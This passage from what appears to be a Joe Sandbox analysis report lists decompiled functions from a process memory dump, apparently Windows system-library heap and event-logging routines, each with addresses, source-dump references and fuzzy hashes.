				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x38bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E037E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0380B640(E03809AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0385fe96
0x0385fe9e
0x0385fea1
0x0385fead
0x0385feb3
0x0385feb9
0x0385fec3
0x0385fed5
0x0385fec5
0x0385fece
0x0385fece
0x0385fee0
0x0385fee1
0x0385fee3
0x0385fee8
0x0385fefb

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67397dc58f0a9938564b61b76da3766958c61287e7a3e4b161a2d3dcfe8c9ab5
Instruction ID: a93e2443749d5f51c75fddf5f8ab5d5ac270c4138883e7b6c032d8c121c9b895
Opcode Fuzzy Hash: 67397dc58f0a9938564b61b76da3766958c61287e7a3e4b161a2d3dcfe8c9ab5
Instruction Fuzzy Hash: 60014F74A0020CEFCB14DFA8D546A6EB7B4EF08304F1441A9B914EF382E635D901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0388131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0388131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x38bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E037E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0380B640(E03809AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0388131b
0x0388132a
0x03881330
0x03881336
0x0388133e
0x03881341
0x03881344
0x0388134f
0x03881361
0x03881351
0x0388135a
0x0388135a
0x0388136c
0x0388136d
0x0388136f
0x03881374
0x03881387

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 913496cb533511693f4d8ed540b08ad147bcd79f854fdbbd43c7e934e37b5e50
Instruction ID: 686c292b71aee6fcd7d1a3f1631da8172933d0937f57c39dff7daaf5544a1a46
Opcode Fuzzy Hash: 913496cb533511693f4d8ed540b08ad147bcd79f854fdbbd43c7e934e37b5e50
Instruction Fuzzy Hash: 2C011D75A0124CAFCB44EFE9D545AAEB7F4EF48700F504099F905EB391EA74AA00CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03898F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E03898F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x38bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E037E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0380B640(E03809AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x03898f6a
0x03898f79
0x03898f81
0x03898f84
0x03898f8b
0x03898f91
0x03898f94
0x03898f9e
0x03898fb0
0x03898fa0
0x03898fa9
0x03898fa9
0x03898fbb
0x03898fbc
0x03898fbe
0x03898fc3
0x03898fd6

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8411391ddb87c4fae59ebb7d272404d7f0a3eceee640627137146bdf2e2e5d4
Instruction ID: 1a7a3a1559d1702d0e5afdb45b7802b8c993882ca504334ad0325aa5b4ebed82
Opcode Fuzzy Hash: c8411391ddb87c4fae59ebb7d272404d7f0a3eceee640627137146bdf2e2e5d4
Instruction Fuzzy Hash: 08014475A0020DAFDB04EFA8D545AAEB7F4EF48300F54409AF905EB381EB74DA00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03881608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E03881608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x38bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E037E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0380B640(E03809AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x03881608
0x03881617
0x0388161d
0x03881625
0x03881628
0x0388162b
0x03881636
0x03881648
0x03881638
0x03881641
0x03881641
0x03881653
0x03881654
0x03881656
0x0388165b
0x0388166e

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 043141affe27ff8886775542cb633b59eff3b910c43977d3ab279f147abab780
Instruction ID: 74a3603aaf3d6ae2b8ef12fbc1550d832e6eec15e57a3c4c82b37a03088f2693
Opcode Fuzzy Hash: 043141affe27ff8886775542cb633b59eff3b910c43977d3ab279f147abab780
Instruction Fuzzy Hash: 8CF04975A04248EFCB04EFE8D849AAEB7B4AF08300F4440A9A915EB291EA349900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 037EC577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E037EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x37a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E038988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x037ec577
0x037ec57d
0x037ec581
0x037ec5b5
0x037ec5b9
0x037ec5ce
0x037ec5ce
0x037ec5ca
0x00000000
0x037ec5ca
0x037ec5c4
0x037ec5c8
0x00000000
0x00000000
0x00000000
0x037ec5ad
0x00000000
0x037ec5af

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74281c539b5b4ad724bbc0baa4d38b5121732213bfdb58067f1be526ceb1e23d
Instruction ID: d4afe5255dde95559c35134da9bdef16b4b738edb0451f3fe8d91381dacc89f9
Opcode Fuzzy Hash: 74281c539b5b4ad724bbc0baa4d38b5121732213bfdb58067f1be526ceb1e23d
Instruction Fuzzy Hash: 77F0BEBA9157929FE733C768C004F22BFE89B0D670F7C84A7D43687201C6A4D880C261

Uniqueness

Uniqueness Score: -1.00%

Function 0380927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0380927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0380FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E038092C6(_t11, _t14);
				}
				return _t11;
			}

0x03809295
0x03809299
0x0380929f
0x038092aa
0x038092ad
0x038092ae
0x038092af
0x038092b0
0x038092b4
0x038092bb
0x038092bb
0x038092c5

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: ebc72d0b03691fe3dad44730d12a3806d450f3fb02c012f7e43dff3c66c39d5c
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: F9E02B723406006BD761DE5ACC84F03775DDF82720F0440B8F5005E293C6E5DC0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 03898D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E03898D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x38bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E037E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0380B640(E03809AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x03898d34
0x03898d43
0x03898d4b
0x03898d4e
0x03898d52
0x03898d5c
0x03898d6e
0x03898d5e
0x03898d67
0x03898d67
0x03898d79
0x03898d7a
0x03898d7c
0x03898d81
0x03898d94

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b83e47623f1116012050f050cf43e8fe682316161667e193a9c0ba2fbc2d4b
Instruction ID: 24699450ded3561f4f765e87ccb8c74b966eb4f161900b6c7da7eb52aac0fec1
Opcode Fuzzy Hash: f7b83e47623f1116012050f050cf43e8fe682316161667e193a9c0ba2fbc2d4b
Instruction Fuzzy Hash: 4BF09A75A0470CAFDB04EFA8D845A6EB7B4AF08200F5480AAE905EB291EA34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 03882073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03882073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0387FD22(__ecx);
				_t19 =  *0x38b849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x38b8748; // 0x0
					if(__eflags <= 0) {
						E03881C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x38b8724 & 0x00000004;
							if(( *0x38b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x38b8724; // 0x0
					return E03878DF1(__ebx, 0xc0000374, 0x38b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x03882076
0x03882078
0x0388207d
0x03882083
0x038820a4
0x038820aa
0x038820ac
0x038820b7
0x038820ba
0x038820bc
0x038820c9
0x038820c9
0x038820d0
0x038820d2
0x00000000
0x038820d2
0x038820be
0x038820c3
0x038820c5
0x038820c7
0x00000000
0x00000000
0x038820c7
0x038820bc
0x038820d4
0x03882085
0x03882085
0x038820a3
0x038820a3

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8eec60907c98f204d11bcb99b1f554de475fba4e7b43e726df1acdac74b1fbd
Instruction ID: 2922adbfe3d1876810486c334bdc69f3914ffe8449908d0f1726fe9e796e0250
Opcode Fuzzy Hash: b8eec60907c98f204d11bcb99b1f554de475fba4e7b43e726df1acdac74b1fbd
Instruction Fuzzy Hash: BBF0203A4116DA4BEE32FFE831012E22FD9C746114B1D09C1D490DB209D9388883CA25

Uniqueness

Uniqueness Score: -1.00%

Function 037C4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E038988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E037EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x37a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x037c4f2e
0x037c4f34
0x037c4f38
0x03820b85
0x03820b85
0x03820b89
0x03820b9a
0x03820b9a
0x03820b9f
0x00000000
0x03820b9f
0x03820b94
0x03820b98
0x00000000
0x00000000
0x00000000
0x03820b98
0x037c4f3e
0x037c4f48
0x00000000
0x037c4f6e
0x00000000
0x037c4f70

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bae7ea978400e34396d7b70fa49e43bee92dd5ca9686eb700eeab5556daa6cb
Instruction ID: 0b92dce91c61986f181414dc2b00779990ddfd99cea7604141917e4b2e537919
Opcode Fuzzy Hash: 4bae7ea978400e34396d7b70fa49e43bee92dd5ca9686eb700eeab5556daa6cb
Instruction Fuzzy Hash: 71F0E2B65217A88FE771C798C144B22BBD9AB0577CF4C44F5E405CB920C724ECC0C680

Uniqueness

Uniqueness Score: -1.00%

Function 03898B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E03898B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x38bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E037E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0380B640(E03809AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x03898b67
0x03898b6f
0x03898b72
0x03898b7d
0x03898b8f
0x03898b7f
0x03898b88
0x03898b88
0x03898b9a
0x03898b9b
0x03898b9d
0x03898ba2
0x03898bb5

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2f9c7cc045d45ea11845620337bb2a5945dfead2500784c966f6db7df855c2
Instruction ID: 5b95def7858e5694a053249d1028527b4516c858d727793d702921d777060005
Opcode Fuzzy Hash: fb2f9c7cc045d45ea11845620337bb2a5945dfead2500784c966f6db7df855c2
Instruction Fuzzy Hash: 85F05EB5A04259ABDB04EBE8D906A6EB3A4AB08204F580499AA15EB2D1EB74D900C795

Uniqueness

Uniqueness Score: -1.00%

Function 037E746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E037E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E037DEB70(__ecx, 0x38b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E038095D0();
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x037e746d
0x037e746d
0x037e746d
0x037e7471
0x037e7488
0x0382f92d
0x037e748e
0x037e7491
0x037e7495
0x0382f937
0x0382f93a
0x0382f94e
0x0382f953
0x0382f956
0x0382f956
0x037e7495
0x00000000
0x037e7488
0x037e7473
0x037e7478
0x037e747d
0x037e7481
0x00000000
0x037e7481
0x037e747d
0x037e747a
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825c3f047f28741b5c748b3cb3f099f413486cb9a61e8bb630cc1f248692b413
Instruction ID: eb63185ebb94bd93f5e8dae0eacf5b66642b54b9a20bf7def4dc170665a526c2
Opcode Fuzzy Hash: 825c3f047f28741b5c748b3cb3f099f413486cb9a61e8bb630cc1f248692b413
Instruction Fuzzy Hash: 62F0E9369012C4AADF19D7BCC840F79BFB5AF0E210F080195E4D1EF161E7259800C785

Uniqueness

Uniqueness Score: -1.00%

Function 03898CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E03898CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x38bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E037E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0380B640(E03809AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x03898ce5
0x03898ced
0x03898cf0
0x03898cfb
0x03898d0d
0x03898cfd
0x03898d06
0x03898d06
0x03898d18
0x03898d19
0x03898d1b
0x03898d20
0x03898d33

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55b5f70a8fdb3176613c8d695615cdbf1cdff44d4294094b9a91d9e8cf62717
Instruction ID: 54eb24877ee64cb76ca0cdcb7752cbc24fbe89213064165e48331199a8241059
Opcode Fuzzy Hash: b55b5f70a8fdb3176613c8d695615cdbf1cdff44d4294094b9a91d9e8cf62717
Instruction Fuzzy Hash: 6EF0E271A0420DABDF04EFE8E845E6EB7B4EF09200F1401DAE912EB2C1EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 037FA44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x38b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0380FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x037fa44b
0x037fa453
0x037fa472
0x037fa476
0x00000000
0x037fa493
0x037fa47a
0x037fa47f
0x037fa486
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbcef7f16d60b3a6d0d2d269372ccd9e120f69beb378f58b21a716a3d732e642
Instruction ID: dfc46d3c6efd5e8c87b3e53137b333eb1f57c3575ec5d16319ced982c4430766
Opcode Fuzzy Hash: cbcef7f16d60b3a6d0d2d269372ccd9e120f69beb378f58b21a716a3d732e642
Instruction Fuzzy Hash: CFE09272A01921ABD2619A58AC00F66B39DEBD8A51F194035F608DB254D628DD01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 037CF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E037CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E037FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L037E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x037cf35d
0x037cf361
0x037cf367
0x037cf372
0x037cf38c
0x037cf38c
0x037cf394

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: bdc806cbd164e2b56bfa91af04594b69d96472900b1c112930b116332afd96be
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: ADE0D832A40218BBCB21D6D99D05F9ABBADDB4CB60F04015AF904DB190D5609D00D3D0

Uniqueness

Uniqueness Score: -1.00%

Function 037DFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x37a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E038988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E037E0050(_t14);
				}
			}

0x037dff66
0x037dff6b
0x00000000
0x037dff8f
0x00000000
0x037dff8f

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
